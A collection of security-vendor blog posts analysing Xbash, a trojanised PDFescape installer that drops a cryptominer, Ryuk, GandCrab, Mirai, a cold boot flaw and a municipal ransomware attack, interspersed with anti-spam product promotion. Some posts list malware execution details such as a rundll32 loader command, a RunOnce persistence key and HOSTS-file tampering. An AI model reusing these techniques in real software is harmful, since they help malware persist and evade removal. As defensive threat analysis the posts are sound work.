Is Xbash the Swiss Army Knife of Windows and Linux malware?

Malware Analysis
Reading Time: 4 minutes

Is Xbash the Swiss Army Knife of Windows and Linux malware?

Recently discovered Xbash malware fits an emerging trend. It’s not just one type of malware, it’s at least four different types. It’s a worm! It’s ransomware! It’s a botnet! It’s a cryptominer! It slices and it dices, and it can be yours for four easy payments of two Bitcoins! Well, I haven’t seen infomercial-style ads on the Dark Web yet, nor have I seen Xbash for sale there. But you can catch my drift, eh?

It also targets both Windows and Linux. It’s not that there’s a Windows version and a Linux version… the same malware with the same payload will try different exploits and malicious activities based on whether the infected target is determined to be Windows or Linux. I use a Linux distro on my home office PC for my everyday work and leisure, but I’m an outlier. Rarely do consumers use Linux directly except perhaps for the Linux kernel on their Android devices. So targeting x86 versions of Linux suggests that the cyber attackers intend to focus on servers, including those which don’t run Windows Server. Attack Windows Server machines running applications like Active Directory and IIS, and attack Linux machines running applications like Apache, and you’ve got the large majority of internet servers around the world.

Originally developed in Python and ported into Linux ELF executables, Xbash tries to infect a system by exploiting weak passwords and well known vulnerabilities such as bugs in Redis services running on either major platform. Xbash appears to be malware that’s in constant development, so the cyber attacker’s command and control servers may transmit malware that’s designed to exploit new and different vulnerabilities in the future.

Researchers believe that the Iron Group, otherwise known as Rocke, is behind Xbash. Iron Group was originally discovered in 2017. The researchers wrote:

“Previously the Iron Group developed and spread cryptocurrency miners or cryptocurrency transaction hijacking trojans mainly intended for Microsoft Windows, with only a few for Linux. Instead, Xbash aimed on discovering unprotected services, deleting victim’s MySQL, PostgreSQL and MongoDB databases, and ransom for Bitcoins. Xbash uses three known vulnerabilities in Hadoop, Redis and ActiveMQ for self-propagation or infecting Windows systems.”

Xbash is definitely an Advanced Persistent Threat. The cyber attackers scan IP addresses on both the internet and on intranets and they appear to be choosing their targets based on certain criteria. Unlike Iron’s previous types of cyber attacks, it seems that making money from ransomware and cryptomining is just one of many of their motives, and their other motives seem kind of mysterious. The cyber attackers really haven’t been making much money from Xbash so far, and it seems deliberate. The ransomware profits seem to only be about $6,000 USD worth of Bitcoin so far. Researcher Jen Miller-Osborn said:

“We agree that it seems odd. Though there is no way for the victims to know the attackers did not create copies of their files to return (as it claims to). It’s only once they’ve paid, and the attackers don’t restore the files, that the victims know their files are truly gone. The attackers may be happy enough to make whatever profits they can without the added step of having to store, track, and return the data.”

Money is certainly a factor, but perhaps the lust for power is an even greater one. Look at what they can leverage with their command and control servers and their ever growing botnet!

Here’s what Xbash does if it has determined that it has infected a Windows machine. Xbash goes through Redis and will deploy Windows attacks if a web server’s location in a file system is typical of Windows, such as in the Program Files folder. A Windows startup item will be created, and a malicious HTML or a Scriptlet file is downloaded from the command and control servers. From there, JavaScript or VBScript code will be used to execute PowerShell to run a malicious PE executable or PE DLL file. Once thoroughly inside a Windows target, further malicious code and instructions from the command and control servers make Xbash show its not-so-charming cryptomining and worm aspects.

If by exploiting Redis, Xbash finds a web server in a location typical of a Linux operating system, such as in the usr/local/ folder, Tux mode commences! (Only I seem to call it Tux mode. I apologize to penguins everywhere.) A Linux cronjob is created, malicious JavaScript or VBScript payloads are downloaded from the command and control servers and are executed. Xbash will look for databases to delete, such as with MongoDB or MySQL. On A Linux system, Xbash will go on to show its equally not-so-charming ransomware and botnet aspects. Each and every side is utterly non-photogenic, darling.

So Xbash doesn’t seem to be a golddigger, but it will inevitably try to exploit many new vulnerabilities in the future and try a variety of different activities so that the Iron Group can have internet servers around the world under their thumb. Whatever forms Xbash takes in the future, making sure that you use much more secure passwords in your OSes, web servers, and web databases, and installing the latest patches will certainly make it more difficult for your network to become the latest Xbash victim.

How To Stop Junk Email

stop spam email
Reading Time: 3 minutes

With the online space evolving into a global marketplace businesses from around the world are trying to capitalise on the internet to tap their new customers and to engage with their existing ones. Besides this benefit, the internet has also provided room for online fraudsters to entice unwary users into phishing scams and make them download malware.

stop spam email

Online fraudsters are good impersonators who trick the users into making their e-mail to appear as legit. Thereby, it is necessary to steer clear of the online risks posed by the hackers. Keep reading to know some of the essential things that you need to do as a responsible email user.

Easy Ways To Stop Junk or Spam Email

Train The Filter

Generally, we all tend to delete the spam in our inbox, when we find them. Select the particular email and report to your mail client that it is spam. Say for example, in the Gmail’s website click the Report spam button in the toolbar.

Stop Answering Spam

When a message is recognized as spam even before it is opened, don’t open it. Even if it is opened unknowingly, close it. Never click the link, download a file, from that message.

Hide The Email Address

Your email address is your personal information, so never share it online or with unknown people. The more it gets popular, the more spam you’re going to get.

Make Use Of Anti-spam Filter

Today, all major security programs come packing an anti-spam filter. So try installing one that can help you get rid of the unnecessary troubles. You can try Comodo Dome Anti-spam which has got the top score for catching spam and integrating with Outlook.

Change The Email Address

If your email inbox is bombarded with spam then the best option is to change your email address to stay away from the vexation. After the switchover, remember not to click or subscribe to unwanted emails. Remember to inform your legitimate contacts about the change, and you would need to keep both addresses for a few months.

Stop Spam Email Using Comodo Dome Anti-spam

Comodo Spam Blocker blocks spam emails effectively regardless of the format, content or language of the message and thereby increases your employee efficiency. Its smart analysis provides quick and continuous protection at times of outbreaks. Moreover, you can get it up and running in minutes. With an intuitive interface, it makes ongoing spam management simple and straight-forward.

The Free Spam Blocker Software, Comodo Dome Antispam is more capable of preventing phishing emails, spam, and infected attachments from reaching the inbox and putting the corporate at risk due to a user’s erroneous double-click. The defense mechanism of Comodo Dome Antispam packs a built-in containment technology and uses excellent spam filters, and content analysis engines to identify and block unwanted emails from accessing the network.

Key Features Of Comodo Dome Antispam

  •    Security and Usability: Users can open, execute, and use email attachments without any hesitation as there is no risk of infection from malicious files.
  •    Granular Control: The centralized control and group-based email policies guarantees system and network safety.
  •    Flexible Deployment: Make use of the one that befits your inadequacy – Available on single-tenant, on-premises, and multi-tenant hosted.

Comodo’s patented containment technology blocks spam emails from entering the network and successfully wards off other infiltration attempts through its signature-based anti-spam software. The infected files are treated in a defined operating system environment, thus controlling the resources and the spread of infection.

If you are in search of a good free spam blocker software solution, look no further that Comodo Dome Anti-spam!

Dome Antispam

Evil clone to attack users: how cybercrooks use legitimate software to spread cryptominers

Reading Time: 5 minutes

Cryptomining has become a gold rush of nowadays, and cybercriminals are also seized by it. They invent more and more cunning gimmicks to infect users’ machines and make them mine cryptocurrency for the attackers’ profit. The cybercrime recently detected by Comodo specialists is a striking illustration of this process. To infect users all over the world, the attackers used the legitimate application installer, the replicated server and… well, let’s not jump ahead but come through all the attack chain from the beginning to the end.

Here is PDFescape software. Many people use it to edit, annotate or fill forms in .PDF files. It’s highly likely you also used this or a similar software.

Of course, it’s legitimate and secure … at least it was so till the recent time when an idea to use it for spreading malware came to a cybercriminal’s mind.

But what is especially interesting, the malicious hackers didn’t try just to mimic PDFescape. They went further and decided to create its evil clone.

Just think of the attack’s scope: the perpetrators recreated the software partner’s infrastructure on a server under their control. Then they copied all MSI (installer package file for Windows) files and placed them on that server. The cloned software was the exact replica of the original one … except one small detail: the attackers decompiled and modified one of MSI files, an Asian font’s pack. And added the malicious payload containing some coinmining code.


This black magic turns original installer of PDFescape into a malicious one.


This modified installer redirects users to the malicious website and downloads the payload with the hidden file.


As you can see, the hacked installer has not original digital signature:


But how exactly this malware harm? Let’s see.

Dynamic Analysis

When a victim downloads this pdfescape-desktop-Asian-and-extended-font-pack, the malicious binary xbox-service.exe drops in Windows system32 folder and executes the malicious DLL, using run32dll. Disguising as setup.log, the malicious DLL hides in Windows folder.

Here is the process flow.

The pdfescape-desktop-Asian-and-extended-font-pack.msi is installed by the com

mand line “C:\\Windows\System32\msiexec.exe” /i

dynamic analysis

Then the installer drops xbox-service.exe in the system32 folder.

The dropped xbox-service.exe starts working as a service:


Then it runs malicious DLL under rundll32 by the name setup.log using the command line:

rundll32 C:\Windows\System32\setup.log.dll

Static Analysis

The modified MSI has embedded malicious DLL file. This DLL, in its turn, contains two executable files in the Resources.

Thus, the DLL file runs malicious process xbox-service.exe.

Another interesting aspect of the DLL payload is that during the installation stage, it tries to modify the Windows HOSTS file to prevent the infected machine from communication with update servers of various PDF-related apps and security software. Thus malware tries to avoid a remote cleaning and remediation of affected machines.

host file

The HOSTS file modified with malicious DLL

And finally, inside the DLL we found the main evil: malicious browser script. The script has an embedded link to


Let’s follow the link and see where it goes:


As it’s now clear, it downloads JavaScript of coinminer named CoinHive that malicious hackers covertly use to infect hosts’s around the world. You can find more details about it in Comodo Q1 2018 and Comodo Q2 2018.

comodo Q1

So all that fuss was to infect users with a cryptominer?! Yes, that’s right. And it helps us to aware that we shouldn’t take this kind of malware lightly.

“As we mentioned in Comodo Q1 2018 and Q2 2018 Global Threat Reports, cryptominers remain one of the most dangerous threats in the cybersecurity space”, comments Fatih Orhan, The Head of Comodo Threat Research Labs.” Some people consider the cryptominers as a not-so-serious threat because they do not steal information or encrypt users’ files but this mistake can be very costly for them in the reality. Cryptominers are turning into sophisticated malware that can crash users systems or capture all the IT resources of an infected enterprise and make them work only for mining cryptocurrency for cybercriminals. Thus, financial losses from a cryptominer attack can be as devastating as of other malware types. Cryptominers will continue to become more and more devious with their dangerous abilities growing. And the story with modified installer detected by our analysts is a clear evidence of it”.

According to the Comodo stats, this malicious file hit 12 810 users in 100 countries around the world. Below are the top-ten affected countries.

countries attack

In general, from April to August 2018, Comodo specialists detected 146,309 JavaScript-based coinminers with unique SHAs.

ctrl labs

Live secure with Comodo!

Related Resources:

How To Improve Your Company’s Cyber Security Readiness

Why you’re putting your network at risk with a defensive approach to malware

The Seven Advantages of Hiring a Cyber Security Provider

Ransomware cripples an Alaskan town

Ransomware Attacks
Reading Time: 3 minutes

It’s bad enough when ransomware infects an individual’s PC or smartphone. Not having access to locally stored files can really throw a wrench in the works of a person’s life. But when it comes to consumer ransomware, usually only one person is inconvenienced per infection.

We know that ransomware attacks enterprise systems too. Public services in particular are a juicy target for cyber attackers deploying ransomware. Ransomware can be really destructive to embedded/IoT devices because they’re computers inside appliances and machines that have practical use in everyday life – refrigerators, MRI scanners, you-name-it. But also systems that municipalities use to support the lives of their citizens are deployed on more conventional types of computers – desktop, servers, and cloud instances. When ransomware impacts municipal computer networks, the effects can get ugly.

On July 23rd, Matanuska-Susitna, a borough near Anchorage, Alaska, ground to a halt. Valdez, Alaska was affected as well.

“The cyber attack has caused major disruption in Borough services and loss of productivity, which may continue for a prolonged time,” said Matanuska-Susitna politician Ted Leonard.

Computer systems supporting libraries, swimming pools, e-commerce, the local landfill, animal care, and collections all ceased functionality.

From Matanuska-Susitna IT Director Eric Wyatt’s report:

“Almost all Windows based production servers have been encrypted, this includes our domain,email (Exchange), Govern, Logos, TRIM, SharePoint (intranet and eCommerce), GIS, SQLdatabases, S:\ drive files shares ( L:\, M:\, P:\ ) and even our backup and Disaster Recovery(DR) servers.

The backup and DR servers had been engineered in a way that no known threats would affect.This new threat has always been considered a theoretical exploit. To date, neither our local network engineering consultant nor the international vendors: Cisco, Dell, Commvault, that theyrepresent, have seen this exploit developed and used. Further, our backup and DR model uses
a multi-tiered approach to data protection, which appears to have saved some portion of ourdata, even under this sophisticated attack.

The phone system (Mitel) was encrypted, we lost some functionality but most direct lines continued to work as long as the phone was powered on.

The door lock card swipe system (Lenel) has also been encrypted but will continue to function in the last known good condition.

Though it initially appeared that our data was a complete loss, we have recently recovered data from the shared drives, Logos, Govern, TRIM, GIS and more.

eMail (Exchange) does appear to be completely unrecoverable.”

Completely unrecoverable… ouch. Matanuska-Susitna workers had to do their jobs with hand receipts and typewriters. The last time I saw a typewriter in use was during my 1980s early childhood, and even that was an electronic Smith Corona model with a bright green monitor, not a mechanical wonder from the early 20th century. What kind of typewriters did they have to use?

The attack was deployed with BitPaymer ransomware, the Emotet Trojan, and a human cyber attacker directly penetrating Matanuska-Susitna’s networks. The exploits leveraged zero day vulnerabilities but used familiar components. BitPaymer may have been on the Borough’s computers as early as May 3rd. But the encryption timebomb was dated for July 23rd.

BitPaymer ransomware was behind an attack on Scottish hospitals in August 2017, about a year ago.

Atlanta, Georgia can sympathize with Matanuska-Susitna. Back in March of this year, their networks were hit by SamSam, a ransomware strain that impacted Indiana’s Hancock Health in January. Among the functions stopped in Atlanta’s SamSam attack were utility billing systems, police and city worker reporting, parking ticket payment, sewer infrastructure requests, and the digital backbone of the city’s courts of law.

According to a confidential report covered by the Atlanta Journal-Constitution on August 1st, the incident response to March’s SamSam attack could end up costing the city $17 million. That figure doesn’t include speculative losses from the downtime of Atlanta’s computer systems, just fixing the damage done. Apparently Atlanta’s computers hadn’t been security patched for months.

What you need to know about the newest Cold Boot exploit

Cyber Attacks
Reading Time: 3 minutes

Cold boot attacks

Kim Crawley

The cybersecurity industry is all abuzz over a recently discovered and very scary exploit, a new devastating Cold Boot vulnerability. Cold Boot attacks occur when sensitive data is available for cyber attackers to copy from a computer’s RAM because the machine wasn’t shut down properly, such as through an ACPI cold boot or hard shut down after the system powers off. Now a new cold boot exploit has been found and people are understandably concerned. There’s good news and bad news about it.

Don’t you want to read the good news first? Here it is. Cold Boot attacks have been largely prevented through security hardening since their initial discovery in 2008. Most PCs that OEMs have produced since then are careful to remove data from RAM during the shutdown process. And in order for a cyber attacker to exploit this recently discovered Cold Boot vulnerability, they need physical access to the target machine and about five minutes to perform the attack. So this attack cannot be conducted over the internet and the cyber attacker can’t do it instantaneously. There’s a bit of a time window to catch them in the process.

Now’s the time for me to be a Debbie Downer. Here’s the bad news. This newly discovered vulnerability affects the majority of PCs, including those produced after 2008. It even affects PCs that have been produced this year. Most modern laptops are vulnerable, including models from Lenovo, Dell, and even Apple. Laptops from HP, Toshiba, Sony, and many other popular OEMs are probably affected too. The only recent MacBooks and iMacs that are safe from the recently discovered exploit are those with a T2 chip. According to Apple, iMac Pros and MacBook Pros from 2018 have the T2 chip. If your Apple Mac model doesn’t have “Pro” in its name, or if it does have “Pro” in its name but it predates 2018, it’s probably still Cold Boot vulnerable. The data that a cyber attacker can acquire from an affected Windows OEM or Mac’s RAM could contain very, very sensitive information, such as authentication data and cryptographic keys – even if you encrypt your hard drive through your operating system. That sort of data can be used by a cyber attacker to help establish administrative access to your computer and possibly to your local network as well. There are many possibilities for destruction if that sort of data falls into the wrong hands. A cyber attacker can acquire the data with physical access to your machine if you put it into sleep mode. Only a total shut down or hibernate may be safe. The security hardening performed since 2008 really only works reliably if a total shutdown or hibernate is performed. That’s the big, scary news in a nutshell.

Security consultant Olle Segerdahl said:

“It’s not exactly easy to do, but it’s not a hard enough issue to find and exploit for us to ignore the probability that some attackers have already figured this out. It’s not exactly the kind of thing that attackers looking for easy targets will use. But it is the kind of thing that attackers looking for bigger phish, like a bank or large enterprise, will know how to use.”

Security hardening against this exploit is going to be really tricky, a major uphill battle. There’s no patch so far. Segerdahl added:

“When you think about all the different computers from all the different companies and combine that with the challenges of convincing people to update, it’s a really difficult problem to solve easily. It will take the kind of coordinated industry response that doesn’t happen overnight. In the meantime, companies will need to manage on their own.”

Until a patch can be deployed, security researchers recommend that all affected PCs be put into hibernate or shut down when unattended by the user. Windows users should be required to enter their BitLocker PIN when they boot or restart their PCs. Microsoft has a page with a list of BitLocker countermeasures that can be deployed to make Windows PCs a little more secure.

Olle Segerdahl presented these worrisome findings during a Swedish conference on September 13th. More information may be presented at Microsoft’s security conference on September 27th.

Mirai Strikes Back

WordPress Roulette
Reading Time: 4 minutes

Mirai strikes

All it took was one malware to form a botnet that left the domain-based internet inaccessible to many on the eastern coast of the United States and in Europe on October 21st, 2016. It was the largest cyber attack to cause internet downtime in US history. We’re coming up on the second anniversary of the notorious Mirai botnet.

A botnet is when many computers get infected with zombie malware which enables them to be controlled by a central server in order to conduct cyber attacks with their collective computing power and bandwidth. They’re a popular way to conduct distributed denial of service (DDoS) attacks which can take down all kinds of different types of networking appliances and internet servers. Denial of service attacks are deployed by overwhelming a network target with packets until its memory buffer is filled over capacity and it’s forced to shut down. The distributed part implies that many computers are coordinated in conducting a denial of service attack.

Mirai searched the internet for IoT (Internet of Things) devices through the Telnet port. If a device had an open Telnet port, the Mirai malware would try a combination of 61 known default username and password combinations in order to find one that would allow it to maliciously authenticate. If one combination worked, the device was added to the massive and growing Mirai botnet. Most of the devices infected by Mirai malware were internet connected closed circuit TV cameras and routers.

The first major internet server attack conducted by the Mirai botnet targeted OVH, a French cloud services provider. Two DDoS attacks with a bandwidth of up to 799Gbps took down some OVH hosted Minecraft servers. By then, the botnet consisted of 145,607 devices.

Comodo malware researcher Venkat Ramanan has been watching the Mirai botnet since its discovery. “The first incident of the Mirai botnet was spotted in august 2016. Millions of IoT device attacks were noted during the same year. Mirai’s cyber criminal gang uploaded Mirai’s source code on Github in October 2016.”

On October 21st 2016, the Mirai botnet hit the Dyn network of DNS servers. DNS servers resolve domain names (such as to IP addresses (such as so that human beings don’t have to remember those IP addresses in order to access internet services. Dyn is a widely used DNS provider, so their downtime made domain-based internet use inaccessible to lots of people. Dyn released their analysis of the attack after their incident response:

“On Friday October 21, 2016 from approximately 11:10 UTC to 13:20 UTC and then again from 15:50 UTC until 17:00 UTC, Dyn came under attack by two large and complex Distributed Denial of Service (DDoS) attacks against our Managed DNS infrastructure. These attacks were successfully mitigated by Dyn’s Engineering and Operations teams, but not before significant impact was felt by our customers and their end users.

The first attack began around 11:10 UTC on Friday October 21, 2016. We began to see elevated bandwidth against our Managed DNS platform in the Asia Pacific, South America, Eastern Europe, and US-West regions that presented in a way typically associated with a DDoS attack

This attack has opened up an important conversation about internet security and volatility. Not only has it highlighted vulnerabilities in the security of ‘Internet of Things’ (IoT) devices that need to be addressed, but it has also sparked further dialogue in the internet infrastructure community about the future of the internet. As we have in the past, we look forward to contributing to that dialogue.”

The attack not only brought attention to how vulnerable IoT devices can be, but it also served as an excellent reminder to always change the default settings on your internet connected devices- especially usernames and passwords!

Well now, Mirai is back and badder than ever. One of the challenges of developing IoT malware is how very different IoT devices are from each other. There’s tremendous diversity in IoT devices because they can manifest as anything from industrial controllers to medical devices, from children’s toys to kitchen appliances. They can run a multitude of different operating systems and embedded software, so malicious code that can exploit the vulnerabilities on one particular device can’t usually exploit most other devices. But with the help of the Aboriginal Linux project, the latest Mirai malware can exploit a wide range of IoT devices. A malware researcher discovered it in the wild:

“At the end of July, I came across a live remote server hosting multiple malware variants, each for a specific platform. As with many Mirai infections, it starts by firing a shell script on a vulnerable device. That shell script sequentially tries downloading and executing individual executables one by one until a binary compliant with the current architecture is found…

While this is similar behavior to the Mirai variants we’ve seen so far, what makes it interesting is the compiled binary. These variants have been created by leveraging an open-source project called Aboriginal Linux that makes the process of cross-compilation easy, effective, and practically fail-proof. It should be noted that there is nothing malicious or wrong with this open-source project, the malware authors are once again leveraging legitimate tools to supplement their creations, this time with an effective cross compilation solution.

Given that the existing code base is combined with an elegant cross-compilation framework, the resultant malware variants are more robust and compatible with multiple architectures and devices, making it executable on a wide variety of devices ranging from routers, IP cameras, connected devices, and even Android devices.”

If you have IoT devices that run a version of Linux or Android and you want to security harden against this latest version of Mirai, here’s what you can do. Disable Telnet logins if possible, and block the Telnet port altogether. If you’re using default usernames and passwords, change them! Disable Universal Plug and Play (UpnP) if you can, and deploy wired Ethernet in lieu of WiFi if you’re able to. If you need to use WiFi, only connect to encrypted WiFi (WPA2 or the upcoming WPA3 is best), and have a complex password for your wireless access point.

Related Resource:

Ryuk Ransomware Authors: “Be thankful you’re hacked by serious people.”

Ransomware Attacks
Reading Time: 3 minutes

Ryuk Ransomware

Look out, SamSam. There’s a new ransomware in town that’s very carefully targeting enteprises and businesses. Say hello to Ryuk. In the first two weeks after its August debut, the ransomware has made their cyber attackers over $640,000 USD. By contrast, SamSam has taken about three years to make its author about $6 million USD.

While the people behind Ryuk are on their way to their first million dollars worth of Bitcoin, they also think you should be very honored to be attacked by them. This is some of what their ransom note says:

“Gentlemen! Your business is at serious risk. There is a significant hole in the security of your company… You should thank the Lord for being hacked by serious people not some stupid schoolboys or dangerous punks… The final price depends on how fast you write to us. Every day of delay will cost you additional +0.5BTC… Nothing personal just business.”

Cryptocurrency values fluctuate wildly, but when I checked the Bitcoin to US dollar exchange rate on August 23rd, a Bitcoin was $6,410.74. So apparently each day an organization delays costs them more than a few grand. The main ransom amount demanded has varied from 15 to 50 Bitcoin, that’s about $96,000 to $320,000. Because these attacks are so targeted, I believe they may be adjusting their demand according to what they think their target can pay.

Like most other ransomware that targets the enterprise, Ryuk exploits Windows vulnerabilities. But unlike WannaCry, there isn’t one specific vulnerability that it always targets first, such as that notorious Windows SMB exploit. Ryuk’s cyber attackers will spend time mapping their targets’ networks and maliciously acquiring credentials. As Microsoft patches Windows and Cisco patches networking devices, the Ryuk team will probably find new vulnerabilities to exploit. And they do it all just for you!

It’s hypothesized that the people behind Ryuk are either North Korea’s Lazarus Group, or a group that has learned from Lazarus’ work. That’s because Ryuk resembles HERMES in many ways. HERMES was discovered in October 2017 when it was used against Taiwan’s Far Eastern International Bank to steal about $60 million through SWIFT. It’s strongly believed that Lazarus conducted that attack. The code used in Ryuk to place a marker to check that a file has been encrypted is identical to the code used for the same function in HERMES. Both Ryuk and HERMES are very selective of what they encrypt in a Windows system. They’ll encrypt what the target really needs, but not what they need in order to read the ransom note and make the Bitcoin payment. And they both go about the encryption process the same way, whitelisting specific Windows folders, writing a file called “window.bat” to each folder, and a script to delete shadow volumes and backup files.

Ryuk is also ready to exploit really legacy Windows systems, such as Windows 2000 32-bit. What is an OS that’s been out of support for so long doing on the internet? Or maybe those machines are just in an organization’s internal network, but the Ryuk black hats must have gotten into their targets’ internal networks through a machine that is connected to the internet. Any computer that runs an OS that’s no longer supported should be completely isolated from the internet, or exist as a virtual machine (that a network administrator can delete at will) if using that OS/version can’t possibly be avoided.

Ryuk also has a really nasty persistence technique. It just writes itself to the Run registry. Ouch!

Only time will tell if Ryuk is the work of North Korea’s notorious Lazurus Group, or if we’re looking at the work of Lazurus Part Deux. The LulzSec to Lazarus’ Anonymous if you will. (Well not only time will tell, but also the work of dedicated malware researchers like the Comodo threat intelligence lab.)

Related Resources:

Free Virus Removal


What is Computer Virus

Anti-spam Filtering Techniques

Anti-spam Filtering Techniques
Reading Time: 3 minutes

Antispam solutions can be of great use if you or your business is experiencing huge volumes of spam emails. With the Internet becoming the dominant platform for businesses to reach out to the customers, unsolicited bulk email aka spam has reached epidemic proportions.

As more and more digital marketers’ turn to bulk email as a viable means to reach potential customers, this trend of sending unsolicited bulk emails will continue to rise.

Spam has become a quite an annoyance affecting individuals and business alike. Usually, malware attacks caused by viruses, worms, adware and Trojan horses catch people’s attention, but spam is arguably a more serious security threat. This is because spam affects every Internet user (directly or indirectly) and there is no viable solution to spam when compared to antivirus software programs. Antispam solutions come handy for such scenarios.

Anti-spam Filtering Techniques


With a proactive Anti-spam solution, spam emails sent by unknown senders can be filtered out effectively. It saves a lot of time which would have been wasted in determining and disposing of the unwanted spam e-mails.

Currently, there exists a wide range of countermeasures to deal with spam emails. Let us discuss in detail about some of the most effective spam filtering techniques to manage this ever-increasing problem.

Spam Filtering by Content

The most commonly used technique to block spam is by filtering some common words used in spam emails. Some of the most common spam words include additional income, cash bonus and some claims you are a winner. You can filter such words or emails of such topics.

Blacklisting Certain Ips

Another commonly used spam filtering technique is blacklisting certain IP addresses that are known to be used by spammers. This way, you can prevent spam emails from those IPs.

Avoid Posting Your Email ID Publicly in the Internet

Avoid posting your real email address on the public lists and forms if you don’t have to. This way you can prevent spammers from accessing your email and purchasing it from other spammers (email harvesting).

If you want to post your real email address on a website or something similar, use extra spaces or preferably replace the @ symbol in your email with (at). Avoid posting your entire email ID in the form that it’s used to send the message. This will reduce the chance of spambots finding your real email ID online.

Use Contact Forms

If you running a business, you can use contact forms on your website instead of using your real email ID. This may be your best option for reducing the amount of spam you get. Users won’t see your email ID and instead fill out the form in the web browser which will send that info to your email address.

Use an Effective Antispam Solution

Antispam solutions such as the Comodo Dome Antispam will prevent spam emails even before they reach your inbox. Apart from automatically quarantining the spam emails, there are many other benefits associated with the use of the antispam solution. You will have a limited number of false positives, filters 99.9% of spam from reaching your inbox, etc.

If you are in search of a good anti-spam solution for your company, look no further get Comodo Dome Anti-spam today!

Dome Antispam

Related Resources:

In The Crab’s Claws: The New Version Of Ransomware Hits Everyone But Russians

There is no such thing as good malware
Reading Time: 5 minutes

The arms race between cybercriminals and cybersecurity warriors is increasing at an enormous speed. Malware authors immediately react on any detected and neutralized malware with new, more sophisticated samples to bypass the freshest antimalware products. GandCrab is a bright representative of such new-generation malware.

First discovered in January 2018, this sophisticated, cunning and constantly changing ransomware has already four versions significantly distinguishing from each other. Cybercriminals constantly added new features for harder encryption and avoiding detection. The last sample Comodo malware analysts discovered has something brand-new: it utilizes Tiny Encryption Algorithm (TEA) to avoid detection.

Analyzing GandCrab is useful not as an exploration of a particular new malware, throughout some researchers called it a “New King of ransomware”. It’s a clear example of how modern malware readjusts to the new cybersecurity environment. So, let’s go deeper into the GandCrab’s evolution.

The history

GandCrab v1

The first version of GandCrab, discovered on January 2018, encrypted users’ files with a unique key and extorted a ransom in DASH crypto-currency. The version was distributed via exploit kits such as RIG EK and GrandSoft EK. The ransomware copied itself into the“%appdata%\Microsoft” folder and injected to the system process nslookup.exe.

It made the initial connection to to find out the public IP of the infected machine, and then run the nslookup process to connect to the network gandcrab.bit using the “.bit” top-level domain.

This version quickly spread in the cyberspace but its triumph was stopped at the end of February: a decryptor was created and placed online, thus letting victims decrypt their files without paying a ransom to the perpetrators.

GandCrab v2

The cybercriminals did not stay long with the answer: in a week, the GandCrab version 2 hit the users. It had a new encryption algorithm making the decryptor useless. The encrypted files had .CRAB extension and hardcoded domains changed to ransomware.bit and zonealarm.bit. This version was propagated via spam emails in March.

GandCrab v3

The next version came up in April with new ability to change a victim’s desktop wallpapers to a ransom note. Constant switching between desktop and the ransom banner was definitely aimed to exert more psychological pressure on the victims. Another new feature was RunOnce autorun registry key:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\whtsxydcvmtC:\Documents and Settings\Administrator\Application Data\Microsoft\yrtbsc.exe

Reflective Loader DLL injection starts the malicious activity

GandCrab v4

Finally, new, the fourth version of Gandcrab v4 has come up in July with a variety of significant updates, including a new encryption algorithm. As Comodo analyst discovered, the malware now uses Tiny Encryption Algorithm (TEA) to avoid detection — one of the fastest and efficient cryptographic algorithms developed by David Wheeler and Roger Needham on the symmetric encryption base.

Also, all encrypted files now have an extension .KRAB instead of CRAB.

In addition, the cybercriminals changed the way of the ransomware dissemination. Now it’s spread through fake software crack sites. Once a user downloads and runs such “stuffing” crack, the ransomware drops on the computer.

Here is an example of such fake software crack. Crack_Merging_Image_to_PDF.exe, in reality, is GandCrab v4.

Let’s see in details what will happen if a user runs this file.

Under the hood

As mentioned above, the GandCrab ransomware uses strong and fast TEA encryption algorithm to avoid detection. Decryption routine function gets the GandCrab plain file.

The Decryption Routine Function

After the decryption is complete, the original GandCrab v4 file drops and runs, starting the killing raid.

Firstly, the ransomware checks the list of the following processes with CreateToolhelp32Snapshot API and terminate any of them running:

Then ransomware checks for a keyboard layout. If it occurs to be Russian, GandCrab terminates the execution immediately.

Generating URL Process

Significantly, GandCrab uses a specific random algorithm to generate URL for each host. This algorithm are based on the following pattern:


The malware consistently creates all elements of the pattern, resulting in a unique URL.

You can see the URL created by malware on in the right column.

Information Gathering

GandCrab collects the following information from the infected machine:

Then it checks for an antivirus running…

… and gathers the information about the system. After that, it encrypts all collected information with XOR and sends it to the Command-and-Control server. Significantly, it uses for encryption “jopochlen” key string that is an obscene language in Russian. That’s one more clear sign of Russian origination of the malware.

Key Generation

The ransomware generates private and public keys using Microsoft Cryptographic Provider and the following APIs:

Before starting the encryption process, the malware checks for some files…

… and folders to skip them during encryption:

These files and folders are necessary for the ransomware to function properly. After that, GandCrab begins encrypting the victim’s files.

The ransom

The ransom

When the encryption is over, GandCrab opens a KRAB-DECRYPT.txt file that is the ransom note:

If the victim follows the perpetrators’ instructions and goes to their TOR site, she’ll find the ransom banner with the counter:

The payment page contents detailed instruction on how to pay the ransom.

Comodo cybersecurity research team has traced the GandCrab communication IPs. Below is top-ten countries from this IPs list.

GandCrab hit users all over the world. Here is the list of top-ten countries affected by the malware.

“This finding of our analysts clearly demonstrate that malware swiftly changes and evolves in its rapidity of adaptation to cybersecurity vendors’ countermeasures”, comments Fatih Orhan, The Head of Comodo Threat Research Labs. “Obviously, we are at the edge of the time when all processes in the cybersecurity field are intensely catalyzing. Malware is quickly growing not only in quantity but also in its ability to mimic instantly. In Comodo Cybersecurity First Quarter 2018 Threat Report, we predicted that downsizing of ransomware was just a redeployment of forces and we’ll face with updated and more complicated samples in the nearest future. The appearance of GandCrab clearly confirms and demonstrate this trend. Thus, cybersecurity market should be ready to face with upcoming waves of attacks loaded with brand-new ransomware types.”

Live secure with Comodo!

Related Resources:

What is Computer Virus